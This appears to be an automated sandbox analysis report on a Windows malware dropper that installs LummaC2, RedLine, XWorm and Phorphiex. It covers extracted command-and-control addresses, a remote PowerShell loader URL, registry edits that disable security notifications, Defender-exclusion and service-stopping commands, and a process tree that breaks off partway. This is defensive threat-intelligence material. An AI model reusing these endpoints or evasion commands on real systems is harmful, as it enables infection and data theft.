Analysis
-
max time kernel
116s -
max time network
134s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-10-2024 19:01
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.exe
Resource
win10v2004-20241007-en
Errors
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
https://raw.githubusercontent.com/43a1723/test/refs/heads/main/shellcode/loaderclient.ps1
Extracted
xworm
5.0
110.164.203.191:7000
AExowENWrg3jY19C
-
Install_directory
%Temp%
-
install_file
windows32.exe
Extracted
phorphiex
http://185.215.113.84
Extracted
xworm
-
install_file
wintousb.exe
Signatures
-
Detect Xworm Payload 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe family_xworm behavioral2/memory/4608-24-0x0000000000160000-0x0000000000170000-memory.dmp family_xworm behavioral2/memory/1800-1543-0x000001CD7EE70000-0x000001CD7EE88000-memory.dmp family_xworm -
Modifies security service 2 TTPs 1 IoCs
Processes:
sysppvrdnvs.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysppvrdnvs.exe -
Phorphiex family
-
Phorphiex payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe family_phorphiex -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3760-145-0x0000000000400000-0x0000000000428000-memory.dmp family_redline -
Redline family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
Processes:
2578611513.exewinupsecvmgr.exewinn.exedescription pid process target process PID 5076 created 3348 5076 2578611513.exe Explorer.EXE PID 5076 created 3348 5076 2578611513.exe Explorer.EXE PID 5008 created 3348 5008 winupsecvmgr.exe Explorer.EXE PID 5008 created 3348 5008 winupsecvmgr.exe Explorer.EXE PID 5008 created 3348 5008 winupsecvmgr.exe Explorer.EXE PID 3204 created 3348 3204 winn.exe Explorer.EXE PID 3204 created 3348 3204 winn.exe Explorer.EXE PID 3204 created 3348 3204 winn.exe Explorer.EXE PID 3204 created 3348 3204 winn.exe Explorer.EXE PID 3204 created 3348 3204 winn.exe Explorer.EXE PID 3204 created 3348 3204 winn.exe Explorer.EXE PID 3204 created 3348 3204 winn.exe Explorer.EXE PID 3204 created 3348 3204 winn.exe Explorer.EXE -
Processes:
sysppvrdnvs.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysppvrdnvs.exe -
Xworm family
-
Blocklisted process makes network request 7 IoCs
Processes:
powershell.exepowershell.exeflow pid process 167 4248 powershell.exe 172 1800 powershell.exe 173 4248 powershell.exe 174 4248 powershell.exe 175 1800 powershell.exe 180 1800 powershell.exe 183 1800 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1800 powershell.exe 2612 powershell.exe 3316 powershell.exe 3656 powershell.exe 2896 powershell.exe 4248 powershell.exe 3764 powershell.exe 4816 powershell.exe 1740 powershell.exe 4504 powershell.exe 4048 powershell.exe 2428 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
installs.exe667532329.exemshta.exemshta.exe4363463463464363463463463.exesysppvrdnvs.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation installs.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation 667532329.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation 4363463463464363463463463.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation sysppvrdnvs.exe -
Drops startup file 2 IoCs
Processes:
XClient.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windows32.lnk XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windows32.lnk XClient.exe -
Executes dropped EXE 22 IoCs
Processes:
LummaC2.exeXClient.exenewtpp.exesysppvrdnvs.exeinstalls.exe667532329.exeinstalls.exe776723694.exe601415316.exe2578611513.exe97196632.execrypted.exewinn.exeEdge.exeEdge.exewinupsecvmgr.exeiupdate.execryyy.exestub.exestub.exeUpdated.scrUpdated.scrpid process 3480 LummaC2.exe 4608 XClient.exe 5116 newtpp.exe 4900 sysppvrdnvs.exe 4072 installs.exe 2336 667532329.exe 3760 installs.exe 5004 776723694.exe 2340 601415316.exe 5076 2578611513.exe 1880 97196632.exe 3812 crypted.exe 3204 winn.exe 3532 Edge.exe 1784 Edge.exe 5008 winupsecvmgr.exe 1544 iupdate.exe 3636 cryyy.exe 1904 stub.exe 2036 stub.exe 2416 Updated.scr 3128 Updated.scr -
Loads dropped DLL 44 IoCs
Processes:
stub.exeUpdated.scrpid process 2036 stub.exe 2036 stub.exe 2036 stub.exe 2036 stub.exe 2036 stub.exe 2036 stub.exe 2036 stub.exe 2036 stub.exe 2036 stub.exe 2036 stub.exe 2036 stub.exe 2036 stub.exe 2036 stub.exe 2036 stub.exe 2036 stub.exe 2036 stub.exe 2036 stub.exe 2036 stub.exe 2036 stub.exe 2036 stub.exe 2036 stub.exe 2036 stub.exe 3128 Updated.scr 3128 Updated.scr 3128 Updated.scr 3128 Updated.scr 3128 Updated.scr 3128 Updated.scr 3128 Updated.scr 3128 Updated.scr 3128 Updated.scr 3128 Updated.scr 3128 Updated.scr 3128 Updated.scr 3128 Updated.scr 3128 Updated.scr 3128 Updated.scr 3128 Updated.scr 3128 Updated.scr 3128 Updated.scr 3128 Updated.scr 3128 Updated.scr 3128 Updated.scr 3128 Updated.scr -
Processes:
sysppvrdnvs.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysppvrdnvs.exe -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
newtpp.exeXClient.exeinstalls.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe" newtpp.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows32 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\windows32.exe" XClient.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Qolio = "\"C:\\Users\\Admin\\AppData\\Roaming\\Izkzqdwlb\\Qolio.exe\"" installs.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
Processes:
flow ioc 118 raw.githubusercontent.com 167 raw.githubusercontent.com 172 raw.githubusercontent.com 183 raw.githubusercontent.com 202 raw.githubusercontent.com 54 bitbucket.org 55 bitbucket.org 117 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 164 ip-api.com -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 760 tasklist.exe 2220 tasklist.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
installs.execrypted.exewinupsecvmgr.exewinn.exedescription pid process target process PID 4072 set thread context of 3760 4072 installs.exe installs.exe PID 3812 set thread context of 2712 3812 crypted.exe RegAsm.exe PID 5008 set thread context of 2652 5008 winupsecvmgr.exe conhost.exe PID 5008 set thread context of 4896 5008 winupsecvmgr.exe dwm.exe PID 3204 set thread context of 1084 3204 winn.exe InstallUtil.exe -
Drops file in Windows directory 2 IoCs
Processes:
newtpp.exedescription ioc process File created C:\Windows\sysppvrdnvs.exe newtpp.exe File opened for modification C:\Windows\sysppvrdnvs.exe newtpp.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 2920 sc.exe 4868 sc.exe 1232 sc.exe 2932 sc.exe 448 sc.exe -
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Files\stub.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 22 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
sc.exeinstalls.exe97196632.execrypted.execryyy.execmd.exesysppvrdnvs.execmd.exeiupdate.exeLummaC2.exesc.exepowershell.exesc.exe601415316.exeRegAsm.exe4363463463464363463463463.exesc.exesc.exepowershell.exeinstalls.exe776723694.exenewtpp.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language installs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 97196632.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language crypted.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cryyy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysppvrdnvs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LummaC2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 601415316.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language installs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 776723694.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language newtpp.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
cryyy.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 cryyy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString cryyy.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exe667532329.exe2578611513.exepowershell.exewinupsecvmgr.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewinn.exepowershell.exepowershell.exepid process 4816 powershell.exe 4816 powershell.exe 4816 powershell.exe 1756 powershell.exe 1756 powershell.exe 1756 powershell.exe 2336 667532329.exe 2336 667532329.exe 5076 2578611513.exe 5076 2578611513.exe 3316 powershell.exe 3316 powershell.exe 5076 2578611513.exe 5076 2578611513.exe 5008 winupsecvmgr.exe 5008 winupsecvmgr.exe 3656 powershell.exe 3656 powershell.exe 3656 powershell.exe 5008 winupsecvmgr.exe 5008 winupsecvmgr.exe 5008 winupsecvmgr.exe 5008 winupsecvmgr.exe 2896 powershell.exe 2896 powershell.exe 1740 powershell.exe 1740 powershell.exe 2896 powershell.exe 1740 powershell.exe 4248 powershell.exe 4248 powershell.exe 4248 powershell.exe 4248 powershell.exe 1800 powershell.exe 1800 powershell.exe 1800 powershell.exe 3204 winn.exe 3204 winn.exe 3204 winn.exe 3204 winn.exe 3204 winn.exe 3204 winn.exe 3204 winn.exe 3204 winn.exe 3204 winn.exe 3204 winn.exe 3204 winn.exe 3204 winn.exe 3204 winn.exe 3204 winn.exe 3204 winn.exe 3204 winn.exe 3204 winn.exe 3204 winn.exe 3204 winn.exe 3204 winn.exe 3204 winn.exe 3204 winn.exe 3204 winn.exe 4288 powershell.exe 4288 powershell.exe 4288 powershell.exe 4504 powershell.exe 4504 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
4363463463464363463463463.exeXClient.exepowershell.exepowershell.exe667532329.exeinstalls.execrypted.exewinn.exepowershell.exedescription pid process Token: SeDebugPrivilege 2664 4363463463464363463463463.exe Token: SeDebugPrivilege 4608 XClient.exe Token: SeDebugPrivilege 4816 powershell.exe Token: SeDebugPrivilege 1756 powershell.exe Token: SeDebugPrivilege 2336 667532329.exe Token: SeDebugPrivilege 4072 installs.exe Token: SeDebugPrivilege 3812 crypted.exe Token: SeDebugPrivilege 3204 winn.exe Token: SeDebugPrivilege 3316 powershell.exe Token: SeIncreaseQuotaPrivilege 3316 powershell.exe Token: SeSecurityPrivilege 3316 powershell.exe Token: SeTakeOwnershipPrivilege 3316 powershell.exe Token: SeLoadDriverPrivilege 3316 powershell.exe Token: SeSystemProfilePrivilege 3316 powershell.exe Token: SeSystemtimePrivilege 3316 powershell.exe Token: SeProfSingleProcessPrivilege 3316 powershell.exe Token: SeIncBasePriorityPrivilege 3316 powershell.exe Token: SeCreatePagefilePrivilege 3316 powershell.exe Token: SeBackupPrivilege 3316 powershell.exe Token: SeRestorePrivilege 3316 powershell.exe Token: SeShutdownPrivilege 3316 powershell.exe Token: SeDebugPrivilege 3316 powershell.exe Token: SeSystemEnvironmentPrivilege 3316 powershell.exe Token: SeRemoteShutdownPrivilege 3316 powershell.exe Token: SeUndockPrivilege 3316 powershell.exe Token: SeManageVolumePrivilege 3316 powershell.exe Token: 33 3316 powershell.exe Token: 34 3316 powershell.exe Token: 35 3316 powershell.exe Token: 36 3316 powershell.exe Token: SeIncreaseQuotaPrivilege 3316 powershell.exe Token: SeSecurityPrivilege 3316 powershell.exe Token: SeTakeOwnershipPrivilege 3316 powershell.exe Token: SeLoadDriverPrivilege 3316 powershell.exe Token: SeSystemProfilePrivilege 3316 powershell.exe Token: SeSystemtimePrivilege 3316 powershell.exe Token: SeProfSingleProcessPrivilege 3316 powershell.exe Token: SeIncBasePriorityPrivilege 3316 powershell.exe Token: SeCreatePagefilePrivilege 3316 powershell.exe Token: SeBackupPrivilege 3316 powershell.exe Token: SeRestorePrivilege 3316 powershell.exe Token: SeShutdownPrivilege 3316 powershell.exe Token: SeDebugPrivilege 3316 powershell.exe Token: SeSystemEnvironmentPrivilege 3316 powershell.exe Token: SeRemoteShutdownPrivilege 3316 powershell.exe Token: SeUndockPrivilege 3316 powershell.exe Token: SeManageVolumePrivilege 3316 powershell.exe Token: 33 3316 powershell.exe Token: 34 3316 powershell.exe Token: 35 3316 powershell.exe Token: 36 3316 powershell.exe Token: SeIncreaseQuotaPrivilege 3316 powershell.exe Token: SeSecurityPrivilege 3316 powershell.exe Token: SeTakeOwnershipPrivilege 3316 powershell.exe Token: SeLoadDriverPrivilege 3316 powershell.exe Token: SeSystemProfilePrivilege 3316 powershell.exe Token: SeSystemtimePrivilege 3316 powershell.exe Token: SeProfSingleProcessPrivilege 3316 powershell.exe Token: SeIncBasePriorityPrivilege 3316 powershell.exe Token: SeCreatePagefilePrivilege 3316 powershell.exe Token: SeBackupPrivilege 3316 powershell.exe Token: SeRestorePrivilege 3316 powershell.exe Token: SeShutdownPrivilege 3316 powershell.exe Token: SeDebugPrivilege 3316 powershell.exe -
Suspicious use of FindShellTrayWindow 17 IoCs
Processes:
dwm.exepid process 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe -
Suspicious use of SendNotifyMessage 17 IoCs
Processes:
dwm.exepid process 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe 4896 dwm.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
iupdate.exepowershell.exepid process 1544 iupdate.exe 1800 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
4363463463464363463463463.exenewtpp.exesysppvrdnvs.execmd.execmd.exeinstalls.exe667532329.execmd.execmd.exedescription pid process target process PID 2664 wrote to memory of 3480 2664 4363463463464363463463463.exe LummaC2.exe PID 2664 wrote to memory of 3480 2664 4363463463464363463463463.exe LummaC2.exe PID 2664 wrote to memory of 3480 2664 4363463463464363463463463.exe LummaC2.exe PID 2664 wrote to memory of 4608 2664 4363463463464363463463463.exe XClient.exe PID 2664 wrote to memory of 4608 2664 4363463463464363463463463.exe XClient.exe PID 2664 wrote to memory of 5116 2664 4363463463464363463463463.exe newtpp.exe PID 2664 wrote to memory of 5116 2664 4363463463464363463463463.exe newtpp.exe PID 2664 wrote to memory of 5116 2664 4363463463464363463463463.exe newtpp.exe PID 5116 wrote to memory of 4900 5116 newtpp.exe sysppvrdnvs.exe PID 5116 wrote to memory of 4900 5116 newtpp.exe sysppvrdnvs.exe PID 5116 wrote to memory of 4900 5116 newtpp.exe sysppvrdnvs.exe PID 4900 wrote to memory of 2496 4900 sysppvrdnvs.exe cmd.exe PID 4900 wrote to memory of 2496 4900 sysppvrdnvs.exe cmd.exe PID 4900 wrote to memory of 2496 4900 sysppvrdnvs.exe cmd.exe PID 4900 wrote to memory of 4976 4900 sysppvrdnvs.exe cmd.exe PID 4900 wrote to memory of 4976 4900 sysppvrdnvs.exe cmd.exe PID 4900 wrote to memory of 4976 4900 sysppvrdnvs.exe cmd.exe PID 4976 wrote to memory of 2920 4976 cmd.exe sc.exe PID 4976 wrote to memory of 2920 4976 cmd.exe sc.exe PID 4976 wrote to memory of 2920 4976 cmd.exe sc.exe PID 2496 wrote to memory of 4816 2496 cmd.exe powershell.exe PID 2496 wrote to memory of 4816 2496 cmd.exe powershell.exe PID 2496 wrote to memory of 4816 2496 cmd.exe powershell.exe PID 4976 wrote to memory of 4868 4976 cmd.exe sc.exe PID 4976 wrote to memory of 4868 4976 cmd.exe sc.exe PID 4976 wrote to memory of 4868 4976 cmd.exe sc.exe PID 4976 wrote to memory of 1232 4976 cmd.exe sc.exe PID 4976 wrote to memory of 1232 4976 cmd.exe sc.exe PID 4976 wrote to memory of 1232 4976 cmd.exe sc.exe PID 4976 wrote to memory of 2932 4976 cmd.exe sc.exe PID 4976 wrote to memory of 2932 4976 cmd.exe sc.exe PID 4976 wrote to memory of 2932 4976 cmd.exe sc.exe PID 4976 wrote to memory of 448 4976 cmd.exe sc.exe PID 4976 wrote to memory of 448 4976 cmd.exe sc.exe PID 4976 wrote to memory of 448 4976 cmd.exe sc.exe PID 2664 wrote to memory of 4072 2664 4363463463464363463463463.exe installs.exe PID 2664 wrote to memory of 4072 2664 4363463463464363463463463.exe installs.exe PID 2664 wrote to memory of 4072 2664 4363463463464363463463463.exe installs.exe PID 4072 wrote to memory of 1756 4072 installs.exe powershell.exe PID 4072 wrote to memory of 1756 4072 installs.exe powershell.exe PID 4072 wrote to memory of 1756 4072 installs.exe powershell.exe PID 4900 wrote to memory of 2336 4900 sysppvrdnvs.exe 667532329.exe PID 4900 wrote to memory of 2336 4900 sysppvrdnvs.exe 667532329.exe PID 2336 wrote to memory of 3688 2336 667532329.exe cmd.exe PID 2336 wrote to memory of 3688 2336 667532329.exe cmd.exe PID 2336 wrote to memory of 4388 2336 667532329.exe cmd.exe PID 2336 wrote to memory of 4388 2336 667532329.exe cmd.exe PID 3688 wrote to memory of 3124 3688 cmd.exe reg.exe PID 3688 wrote to memory of 3124 3688 cmd.exe reg.exe PID 4388 wrote to memory of 4728 4388 cmd.exe schtasks.exe PID 4388 wrote to memory of 4728 4388 cmd.exe schtasks.exe PID 4072 wrote to memory of 3760 4072 installs.exe installs.exe PID 4072 wrote to memory of 3760 4072 installs.exe installs.exe PID 4072 wrote to memory of 3760 4072 installs.exe installs.exe PID 4072 wrote to memory of 3760 4072 installs.exe installs.exe PID 4072 wrote to memory of 3760 4072 installs.exe installs.exe PID 4072 wrote to memory of 3760 4072 installs.exe installs.exe PID 4072 wrote to memory of 3760 4072 installs.exe installs.exe PID 4072 wrote to memory of 3760 4072 installs.exe installs.exe PID 4900 wrote to memory of 5004 4900 sysppvrdnvs.exe 776723694.exe PID 4900 wrote to memory of 5004 4900 sysppvrdnvs.exe 776723694.exe PID 4900 wrote to memory of 5004 4900 sysppvrdnvs.exe 776723694.exe PID 4900 wrote to memory of 2340 4900 sysppvrdnvs.exe 601415316.exe PID 4900 wrote to memory of 2340 4900 sysppvrdnvs.exe 601415316.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3348
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Users\Admin\AppData\Local\Temp\Files\LummaC2.exe"C:\Users\Admin\AppData\Local\Temp\Files\LummaC2.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3480 -
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:4608 -
C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe"C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Windows\sysppvrdnvs.exeC:\Windows\sysppvrdnvs.exe4⤵
- Modifies security service
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4816 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2920 -
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4868 -
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1232 -
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2932 -
C:\Windows\SysWOW64\sc.exesc stop BITS /wait6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:448 -
C:\Users\Admin\AppData\Local\Temp\667532329.exeC:\Users\Admin\AppData\Local\Temp\667532329.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵
- Suspicious use of WriteProcessMemory
PID:3688 -
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:3124
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:4728
-
C:\Users\Admin\AppData\Local\Temp\776723694.exeC:\Users\Admin\AppData\Local\Temp\776723694.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5004 -
C:\Users\Admin\AppData\Local\Temp\601415316.exeC:\Users\Admin\AppData\Local\Temp\601415316.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2340 -
C:\Users\Admin\AppData\Local\Temp\2578611513.exeC:\Users\Admin\AppData\Local\Temp\2578611513.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5076 -
C:\Users\Admin\AppData\Local\Temp\97196632.exeC:\Users\Admin\AppData\Local\Temp\97196632.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1880 -
